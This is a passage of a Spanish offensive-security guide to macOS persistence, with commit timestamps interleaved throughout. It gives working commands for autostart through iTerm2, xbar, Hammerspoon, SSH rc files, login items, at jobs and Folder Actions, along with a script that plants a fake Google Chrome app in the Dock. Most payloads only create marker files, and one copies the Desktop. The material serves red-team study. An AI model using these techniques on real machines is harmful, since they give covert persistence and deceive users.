2024-02-08 22:25:00 +00:00
< figure > < img src = "../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png" alt = "" width = "563" > < figcaption > < / figcaption > < / figure >
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
Y el comando se refleja en las preferencias:
```bash
plutil -p com.googlecode.iterm2.plist
{
[...]
"New Bookmarks" => [
0 => {
[...]
"Initial Text" => "touch /tmp/iterm-start-command"
2023-06-05 18:30:03 +00:00
```
2024-01-10 06:28:19 +00:00
Puedes configurar el comando a ejecutar con:
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
{% code overflow="wrap" %}
2023-09-28 19:22:43 +00:00
```bash
2023-09-28 20:19:13 +00:00
# Add
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist
# Call iTerm
open /Applications/iTerm.app/Contents/MacOS/iTerm2
# Remove
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist
2023-09-28 19:22:43 +00:00
```
2023-09-28 20:19:13 +00:00
{% endcode %}
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
{% hint style="warning" %}
2024-02-07 05:32:25 +00:00
Es altamente probable que haya **otras formas de abusar de las preferencias de iTerm2** para ejecutar comandos arbitrarios.
2023-09-28 20:19:13 +00:00
{% endhint %}
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
### xbar
2024-02-07 05:32:25 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0007/ ](https://theevilbit.github.io/beyond/beyond\_0007/ )
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [✅ ](https://emojipedia.org/check-mark-button )
2023-09-28 20:19:13 +00:00
* Pero xbar debe estar instalado
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [✅ ](https://emojipedia.org/check-mark-button )
* Requiere permisos de Accesibilidad
2023-09-28 19:22:43 +00:00
#### Ubicación
2023-09-28 20:19:13 +00:00
* **`~/Library/Application\ Support/xbar/plugins/`**
2024-02-07 05:32:25 +00:00
* **Disparador**: Una vez que xbar es ejecutado
2023-09-28 20:19:13 +00:00
2023-12-29 14:31:25 +00:00
#### Descripción
2024-02-07 05:32:25 +00:00
Si el popular programa [**xbar** ](https://github.com/matryer/xbar ) está instalado, es posible escribir un script de shell en ** `~/Library/Application\ Support/xbar/plugins/` ** que se ejecutará al iniciar xbar:
2023-12-29 14:31:25 +00:00
```bash
cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" < < EOF
#!/bin/bash
touch /tmp/xbar
EOF
chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"
```
2023-09-28 20:19:13 +00:00
### Hammerspoon
2024-02-07 05:32:25 +00:00
**Descripción**: [https://theevilbit.github.io/beyond/beyond\_0008/ ](https://theevilbit.github.io/beyond/beyond\_0008/ )
2023-12-26 02:09:27 +00:00
2024-02-13 00:50:14 +00:00
* Útil para evadir la sandbox: [✅ ](https://emojipedia.org/check-mark-button )
2023-12-26 02:09:27 +00:00
* Pero Hammerspoon debe estar instalado
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [✅ ](https://emojipedia.org/check-mark-button )
* Requiere permisos de Accesibilidad
2023-09-28 20:19:13 +00:00
#### Ubicación
* **`~/.hammerspoon/init.lua`**
2024-02-07 05:32:25 +00:00
* **Disparador**: Una vez que se ejecuta Hammerspoon
2023-09-28 19:22:43 +00:00
#### Descripción
2024-02-13 00:50:14 +00:00
[**Hammerspoon** ](https://github.com/Hammerspoon/hammerspoon ) sirve como una plataforma de automatización para **macOS** , aprovechando el lenguaje de script **LUA** para sus operaciones. Notablemente, admite la integración de código completo de AppleScript y la ejecución de scripts de shell, mejorando significativamente sus capacidades de scripting.
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
La aplicación busca un único archivo, `~/.hammerspoon/init.lua` , y cuando se inicia, se ejecutará el script.
2023-09-28 20:19:13 +00:00
```bash
2023-12-29 14:31:25 +00:00
mkdir -p "$HOME/.hammerspoon"
2023-09-28 20:19:13 +00:00
cat > "$HOME/.hammerspoon/init.lua" < < EOF
2023-12-29 14:31:25 +00:00
hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2")
2023-09-28 20:19:13 +00:00
EOF
```
2024-02-13 00:50:14 +00:00
### BetterTouchTool
* Útil para evadir la caja de arena: [✅ ](https://emojipedia.org/check-mark-button )
* Pero BetterTouchTool debe estar instalado
* Bypass de TCC: [✅ ](https://emojipedia.org/check-mark-button )
* Solicita permisos de Automatización de accesos directos y Accesibilidad
#### Ubicación
* `~/Library/Application Support/BetterTouchTool/*`
Esta herramienta permite indicar aplicaciones o scripts para ejecutar cuando se presionan algunos accesos directos. Un atacante podría configurar su propio **acceso directo y acción para ejecutar en la base de datos** para hacer que ejecute código arbitrario (un acceso directo podría ser simplemente presionar una tecla).
### Alfred
* Útil para evadir la caja de arena: [✅ ](https://emojipedia.org/check-mark-button )
* Pero Alfred debe estar instalado
* Bypass de TCC: [✅ ](https://emojipedia.org/check-mark-button )
* Solicita permisos de Automatización, Accesibilidad e incluso acceso completo al disco
#### Ubicación
* `???`
Permite crear flujos de trabajo que pueden ejecutar código cuando se cumplen ciertas condiciones. Potencialmente, es posible que un atacante cree un archivo de flujo de trabajo y haga que Alfred lo cargue (es necesario pagar la versión premium para usar flujos de trabajo).
2023-09-28 19:22:43 +00:00
### SSHRC
2024-02-13 00:50:14 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0006/ ](https://theevilbit.github.io/beyond/beyond\_0006/ )
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
* Útil para evadir la caja de arena: [✅ ](https://emojipedia.org/check-mark-button )
* Pero ssh necesita estar habilitado y usado
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [✅ ](https://emojipedia.org/check-mark-button )
2024-02-13 00:50:14 +00:00
* SSH solía tener acceso completo al disco
2023-09-28 20:19:13 +00:00
2023-09-28 19:22:43 +00:00
#### Ubicación
* **`~/.ssh/rc`**
2024-02-13 00:50:14 +00:00
* **Disparador**: Inicio de sesión a través de ssh
2023-09-28 19:22:43 +00:00
* **`/etc/ssh/sshrc`**
2024-02-08 22:25:00 +00:00
* Se requiere permisos de root
2024-02-13 00:50:14 +00:00
* **Disparador**: Inicio de sesión a través de ssh
2023-09-28 19:22:43 +00:00
2023-12-29 14:31:25 +00:00
{% hint style="danger" %}
2024-02-13 00:50:14 +00:00
Para activar ssh se requiere Acceso Completo al Disco:
2023-12-29 14:31:25 +00:00
```bash
sudo systemsetup -setremotelogin on
```
{% endhint %}
2023-09-28 19:22:43 +00:00
2023-12-29 14:31:25 +00:00
#### Descripción y Explotación
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Por defecto, a menos que `PermitUserRC no` en `/etc/ssh/sshd_config` , cuando un usuario **inicia sesión a través de SSH** los scripts ** `/etc/ssh/sshrc` ** y ** `~/.ssh/rc` ** se ejecutarán.
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
### **Elementos de inicio de sesión**
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0003/ ](https://theevilbit.github.io/beyond/beyond\_0003/ )
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
* Útil para evadir la sandbox: [✅ ](https://emojipedia.org/check-mark-button )
2023-09-28 20:19:13 +00:00
* Pero necesitas ejecutar `osascript` con argumentos
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
#### Ubicaciones
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
* **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
* **Disparador:** Inicio de sesión
2023-12-29 14:31:25 +00:00
* Carga útil de explotación almacenada llamando a ** `osascript` **
2023-09-28 20:19:13 +00:00
* **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
* **Disparador:** Inicio de sesión
2024-02-13 00:50:14 +00:00
* Se requiere permisos de root
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
#### Descripción
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
En Preferencias del Sistema -> Usuarios y Grupos -> **Elementos de inicio de sesión** puedes encontrar **elementos que se ejecutarán cuando el usuario inicie sesión** .\
2024-02-07 05:32:25 +00:00
Es posible listarlos, agregar y eliminar desde la línea de comandos:
2023-09-28 19:22:43 +00:00
```bash
2023-09-28 20:19:13 +00:00
#List all items:
osascript -e 'tell application "System Events" to get the name of every login item'
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
#Add an item:
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
#Remove an item:
osascript -e 'tell application "System Events" to delete login item "itemname"'
```
Estos elementos se almacenan en el archivo ** `~/Library/Application Support/com.apple.backgroundtaskmanagementagent` **
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Los **elementos de inicio de sesión** también se pueden indicar utilizando la API [SMLoginItemSetEnabled ](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc ) que almacenará la configuración en ** `/var/db/com.apple.xpc.launchd/loginitems.501.plist` **
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
### ZIP como Elemento de Inicio de Sesión
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
(Consulte la sección anterior sobre Elementos de Inicio de Sesión, esta es una extensión)
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
Si almacenas un archivo **ZIP** como un **Elemento de Inicio de Sesión** , el ** `Archive Utility` ** lo abrirá y si el zip estaba almacenado, por ejemplo, en ** `~/Library` ** y contenía la carpeta ** `LaunchAgents/file.plist` ** con un backdoor, esa carpeta se creará (no lo está de forma predeterminada) y el plist se agregará para que la próxima vez que el usuario vuelva a iniciar sesión, se **ejecute el backdoor indicado en el plist** .
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Otra opción sería crear los archivos ** `.bash_profile` ** y ** `.zshenv` ** dentro del directorio HOME del usuario, por lo que si la carpeta LaunchAgents ya existe, esta técnica seguiría funcionando.
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
### At
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
Artículo: [https://theevilbit.github.io/beyond/beyond\_0014/ ](https://theevilbit.github.io/beyond/beyond\_0014/ )
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [✅ ](https://emojipedia.org/check-mark-button )
2023-12-30 01:04:30 +00:00
* Pero necesitas **ejecutar** ** `at` ** y debe estar **habilitado**
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-12-30 01:04:30 +00:00
2023-09-28 20:19:13 +00:00
#### Ubicación
2023-09-28 19:22:43 +00:00
2023-12-30 01:04:30 +00:00
* Necesitas **ejecutar** ** `at` ** y debe estar **habilitado**
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
#### **Descripción**
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
Las tareas de `at` están diseñadas para **programar tareas únicas** que se ejecutarán en momentos específicos. A diferencia de los trabajos cron, las tareas de `at` se eliminan automáticamente después de la ejecución. Es crucial tener en cuenta que estas tareas son persistentes a través de reinicios del sistema, lo que las convierte en posibles preocupaciones de seguridad bajo ciertas condiciones.
2023-09-28 19:22:43 +00:00
2023-12-30 23:59:08 +00:00
Por **defecto** están **deshabilitadas** , pero el usuario **root** puede **habilitarlas** con:
2023-09-28 20:19:13 +00:00
```bash
sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
```
Esto creará un archivo en 1 hora:
```bash
echo "echo 11 > /tmp/at.txt" | at now+1
```
2024-02-13 00:50:14 +00:00
Verifique la cola de trabajos usando `atq:`
2023-09-28 20:19:13 +00:00
```shell-session
sh-3.2# atq
26 Tue Apr 27 00:46:00 2021
22 Wed Apr 28 00:29:00 2021
```
2023-12-26 02:09:27 +00:00
Arriba podemos ver dos trabajos programados. Podemos imprimir los detalles del trabajo usando `at -c JOBNUMBER`
2023-09-28 20:19:13 +00:00
```shell-session
sh-3.2# at -c 26
#!/bin/sh
# atrun uid=0 gid=0
# mail csaby 0
umask 22
SHELL=/bin/sh; export SHELL
TERM=xterm-256color; export TERM
USER=root; export USER
SUDO_USER=csaby; export SUDO_USER
SUDO_UID=501; export SUDO_UID
SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
MAIL=/var/mail/root; export MAIL
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
PWD=/Users/csaby; export PWD
SHLVL=1; export SHLVL
SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
HOME=/var/root; export HOME
LOGNAME=root; export LOGNAME
LC_CTYPE=UTF-8; export LC_CTYPE
SUDO_GID=20; export SUDO_GID
_=/usr/bin/at; export _
cd /Users/csaby || {
echo 'Execution directory inaccessible' >& 2
exit 1
}
unset OLDPWD
echo 11 > /tmp/at.txt
```
{% hint style="warning" %}
2024-02-07 05:32:25 +00:00
Si las tareas de AT no están habilitadas, las tareas creadas no se ejecutarán.
2023-09-28 20:19:13 +00:00
{% endhint %}
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
Los **archivos de trabajo** se pueden encontrar en `/private/var/at/jobs/`
2023-09-28 20:19:13 +00:00
```
sh-3.2# ls -l /private/var/at/jobs/
total 32
-rw-r--r-- 1 root wheel 6 Apr 27 00:46 .SEQ
-rw------- 1 root wheel 0 Apr 26 23:17 .lockfile
-r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2
-rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2
```
2024-02-07 05:32:25 +00:00
El nombre de archivo contiene la cola, el número de trabajo y la hora programada para ejecutarse. Por ejemplo, veamos `a0001a019bdcd2` .
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
* `a` - esta es la cola
* `0001a` - número de trabajo en hexadecimal, `0x1a = 26`
2024-02-07 05:32:25 +00:00
* `019bdcd2` - hora en hexadecimal. Representa los minutos transcurridos desde la época. `0x019bdcd2` es `26991826` en decimal. Si lo multiplicamos por 60 obtenemos `1619509560` , que es `GMT: 2021. April 27., Tuesday 7:46:00` .
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
Si imprimimos el archivo de trabajo, encontramos que contiene la misma información que obtuvimos usando `at -c` .
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
### Acciones de Carpeta
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
Análisis: [https://theevilbit.github.io/beyond/beyond\_0024/ ](https://theevilbit.github.io/beyond/beyond\_0024/ )\
Análisis: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d ](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d )
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [✅ ](https://emojipedia.org/check-mark-button )
2024-02-13 00:50:14 +00:00
* Pero necesitas poder llamar a `osascript` con argumentos para contactar a ** `System Events` ** y poder configurar Acciones de Carpeta
2023-12-30 01:04:30 +00:00
* Bypass de TCC: [🟠 ](https://emojipedia.org/large-orange-circle )
* Tiene algunos permisos básicos de TCC como Escritorio, Documentos y Descargas
2023-09-28 20:19:13 +00:00
2023-09-28 19:22:43 +00:00
#### Ubicación
2023-09-28 20:19:13 +00:00
* **`/Library/Scripts/Folder Action Scripts`**
2024-02-07 05:32:25 +00:00
* Se requiere permisos de root
2023-12-26 02:09:27 +00:00
* **Disparador**: Acceso a la carpeta especificada
2023-09-28 20:19:13 +00:00
* **`~/Library/Scripts/Folder Action Scripts`**
2023-12-26 02:09:27 +00:00
* **Disparador**: Acceso a la carpeta especificada
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
#### Descripción y Explotación
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Las Acciones de Carpeta son scripts que se activan automáticamente por cambios en una carpeta, como agregar, quitar elementos u otras acciones como abrir o cambiar el tamaño de la ventana de la carpeta. Estas acciones pueden ser utilizadas para diversas tareas y pueden ser activadas de diferentes formas, como usando la interfaz de Finder o comandos de terminal.
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Para configurar Acciones de Carpeta, tienes opciones como:
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
1. Crear un flujo de trabajo de Acción de Carpeta con [Automator ](https://support.apple.com/guide/automator/welcome/mac ) e instalarlo como un servicio.
2. Adjuntar un script manualmente a través de la Configuración de Acciones de Carpeta en el menú contextual de una carpeta.
2024-02-08 22:25:00 +00:00
3. Utilizar OSAScript para enviar mensajes de Evento de Apple a la aplicación `System Events.app` para configurar programáticamente una Acción de Carpeta.
2024-02-07 05:32:25 +00:00
* Este método es particularmente útil para incrustar la acción en el sistema, ofreciendo un nivel de persistencia.
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
El siguiente script es un ejemplo de lo que puede ser ejecutado por una Acción de Carpeta:
2023-09-28 19:22:43 +00:00
```applescript
2024-02-07 05:32:25 +00:00
// source.js
2023-09-28 19:22:43 +00:00
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
```
2024-02-07 05:32:25 +00:00
Para hacer que el script anterior sea utilizable por las Acciones de Carpeta, compílalo usando:
```bash
osacompile -l JavaScript -o folder.scpt source.js
```
2024-02-13 00:50:14 +00:00
Después de compilar el script, configura las Acciones de Carpeta ejecutando el script a continuación. Este script habilitará las Acciones de Carpeta de forma global y adjuntará específicamente el script previamente compilado a la carpeta de Escritorio.
2023-09-28 19:22:43 +00:00
```javascript
2024-02-07 05:32:25 +00:00
// Enabling and attaching Folder Action
2023-09-28 19:22:43 +00:00
var se = Application("System Events");
se.folderActionsEnabled = true;
var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
se.folderActions.push(fa);
fa.scripts.push(myScript);
```
2024-02-07 05:32:25 +00:00
Ejecuta el script de configuración con:
```bash
osascript -l JavaScript /Users/username/attach.scpt
```
* Esta es la forma de implementar esta persistencia a través de la GUI:
2023-09-28 19:22:43 +00:00
Este es el script que se ejecutará:
{% code title="source.js" %}
```applescript
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
```
2023-12-30 23:59:08 +00:00
{% endcode %}
2023-09-28 19:22:43 +00:00
Compílalo con: `osacompile -l JavaScript -o folder.scpt source.js`
Muévelo a:
```bash
mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
```
2024-02-07 05:32:25 +00:00
Luego, abre la aplicación `Folder Actions Setup` , selecciona la **carpeta que deseas vigilar** y selecciona en tu caso ** `folder.scpt` ** (en mi caso lo llamé output2.scp):
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
< figure > < img src = "../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png" alt = "" width = "297" > < figcaption > < / figcaption > < / figure >
2023-09-28 19:22:43 +00:00
Ahora, si abres esa carpeta con **Finder** , tu script se ejecutará.
Esta configuración se almacenó en el **plist** ubicado en ** `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist` ** en formato base64.
2024-02-07 05:32:25 +00:00
Ahora, intentemos preparar esta persistencia sin acceso a la GUI:
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
1. **Copia `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** a `/tmp` para hacer una copia de seguridad:
2023-09-28 19:22:43 +00:00
* `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp`
2023-12-26 02:09:27 +00:00
2. **Elimina** las Acciones de Carpeta que acabas de configurar:
2023-09-28 19:22:43 +00:00
2024-01-10 06:28:19 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-09-28 19:22:43 +00:00
Ahora que tenemos un entorno vacío
3. Copia el archivo de respaldo: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/`
2024-02-07 05:32:25 +00:00
4. Abre la aplicación Folder Actions Setup para consumir esta configuración: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"`
2023-09-28 19:22:43 +00:00
{% hint style="danger" %}
2024-02-07 05:32:25 +00:00
Y esto no funcionó para mí, pero esas son las instrucciones del informe :(
2023-09-28 19:22:43 +00:00
{% endhint %}
2024-02-13 00:50:14 +00:00
### Accesos directos en el Dock
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Informe: [https://theevilbit.github.io/beyond/beyond\_0027/ ](https://theevilbit.github.io/beyond/beyond\_0027/ )
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [✅ ](https://emojipedia.org/check-mark-button )
2024-01-10 06:28:19 +00:00
* Pero necesitas tener instalada una aplicación maliciosa dentro del sistema
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:19:13 +00:00
2023-09-28 19:22:43 +00:00
#### Ubicación
* `~/Library/Preferences/com.apple.dock.plist`
2024-02-07 05:32:25 +00:00
* **Disparador**: Cuando el usuario hace clic en la aplicación dentro del dock
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
#### Descripción y Explotación
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
Todas las aplicaciones que aparecen en el Dock están especificadas dentro del plist: ** `~/Library/Preferences/com.apple.dock.plist` **
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Es posible **agregar una aplicación** solo con:
2023-09-28 19:22:43 +00:00
{% code overflow="wrap" %}
```bash
# Add /System/Applications/Books.app
defaults write com.apple.dock persistent-apps -array-add '< dict > < key > tile-data< / key > < dict > < key > file-data< / key > < dict > < key > _CFURLString< / key > < string > /System/Applications/Books.app< / string > < key > _CFURLStringType< / key > < integer > 0< / integer > < / dict > < / dict > < / dict > '
# Restart Dock
killall Dock
```
{% endcode %}
2024-02-07 05:32:25 +00:00
Usando algo de **ingeniería social** podrías **hacerte pasar por ejemplo por Google Chrome** dentro del dock y realmente ejecutar tu propio script:
2023-09-28 21:21:44 +00:00
```bash
#!/bin/sh
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
# Payload to execute
echo '#!/bin/sh
open /Applications/Google\ Chrome.app/ &
touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
# Info.plist
cat < < EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
< !DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
< key > CFBundleExecutable< / key >
< string > Google Chrome< / string >
< key > CFBundleIdentifier< / key >
< string > com.google.Chrome< / string >
< key > CFBundleName< / key >
< string > Google Chrome< / string >
< key > CFBundleVersion< / key >
< string > 1.0< / string >
< key > CFBundleShortVersionString< / key >
< string > 1.0< / string >
< key > CFBundleInfoDictionaryVersion< / key >
< string > 6.0< / string >
< key > CFBundlePackageType< / key >
< string > APPL< / string >
< key > CFBundleIconFile< / key >
< string > app< / string >
< / dict >
< / plist >
EOF
# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '< dict > < key > tile-data< / key > < dict > < key > file-data< / key > < dict > < key > _CFURLString< / key > < string > /tmp/Google Chrome.app< / string > < key > _CFURLStringType< / key > < integer > 0< / integer > < / dict > < / dict > < / dict > '
killall Dock
```
2024-02-07 05:32:25 +00:00
### Selectores de color
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0017 ](https://theevilbit.github.io/beyond/beyond\_0017/ )
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [🟠 ](https://emojipedia.org/large-orange-circle )
* Se necesita una acción muy específica
2023-09-28 20:19:13 +00:00
* Terminarás en otro sandbox
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:19:13 +00:00
2023-09-28 19:22:43 +00:00
#### Ubicación
2024-01-10 06:28:19 +00:00
* `/Library/ColorPickers`
2024-02-07 05:32:25 +00:00
* Se requieren permisos de root
2024-02-08 22:25:00 +00:00
* Desencadenante: Usar el selector de color
2023-09-28 19:22:43 +00:00
* `~/Library/ColorPickers`
2024-02-08 22:25:00 +00:00
* Desencadenante: Usar el selector de color
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
#### Descripción y Exploit
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
**Compila un** paquete de selector de color con tu código (podrías usar [**este por ejemplo** ](https://github.com/viktorstrate/color-picker-plus )) y agrega un constructor (como en la sección de [Protector de pantalla ](macos-auto-start-locations.md#screen-saver )) y copia el paquete a `~/Library/ColorPickers` .
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Entonces, cuando se active el selector de color, tu código también debería ejecutarse.
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Ten en cuenta que el binario que carga tu biblioteca tiene un **sandbox muy restrictivo** : `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64`
2023-09-28 19:22:43 +00:00
{% code overflow="wrap" %}
```bash
[Key] com.apple.security.temporary-exception.sbpl
[Value]
[Array]
[String] (deny file-write* (home-subpath "/Library/Colors"))
[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
[String] (allow file-read* (extension "com.apple.app-sandbox.read"))
```
{% endcode %}
2024-02-07 05:32:25 +00:00
### Plugins de Sincronización de Finder
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
**Descripción**: [https://theevilbit.github.io/beyond/beyond\_0026/ ](https://theevilbit.github.io/beyond/beyond\_0026/ )\
**Descripción**: [https://objective-see.org/blog/blog\_0x11.html ](https://objective-see.org/blog/blog\_0x11.html )
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: **No, porque necesitas ejecutar tu propia aplicación**
* Bypass de TCC: ???
2023-09-28 19:22:43 +00:00
#### Ubicación
2023-09-28 20:19:13 +00:00
* Una aplicación específica
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
#### Descripción y Exploit
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
Un ejemplo de aplicación con una Extensión de Sincronización de Finder [**se puede encontrar aquí** ](https://github.com/D00MFist/InSync ).
2023-06-05 18:30:03 +00:00
2024-02-13 00:50:14 +00:00
Las aplicaciones pueden tener `Extensiones de Sincronización de Finder` . Esta extensión se ubicará dentro de una aplicación que será ejecutada. Además, para que la extensión pueda ejecutar su código, **debe estar firmada** con un certificado de desarrollador de Apple válido, debe estar **en sandbox** (aunque se podrían agregar excepciones relajadas) y debe estar registrada con algo como:
2023-06-05 18:30:03 +00:00
```bash
2023-09-28 20:19:13 +00:00
pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
pluginkit -e use -i com.example.InSync.InSync
2023-06-05 18:30:03 +00:00
```
2023-09-28 19:22:43 +00:00
### Protector de pantalla
2024-02-08 22:25:00 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0016/ ](https://theevilbit.github.io/beyond/beyond\_0016/ )\
Descripción: [https://posts.specterops.io/saving-your-access-d562bf5bf90b ](https://posts.specterops.io/saving-your-access-d562bf5bf90b )
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [🟠 ](https://emojipedia.org/large-orange-circle )
2023-09-28 20:19:13 +00:00
* Pero terminarás en un sandbox de aplicación común
2024-02-07 05:32:25 +00:00
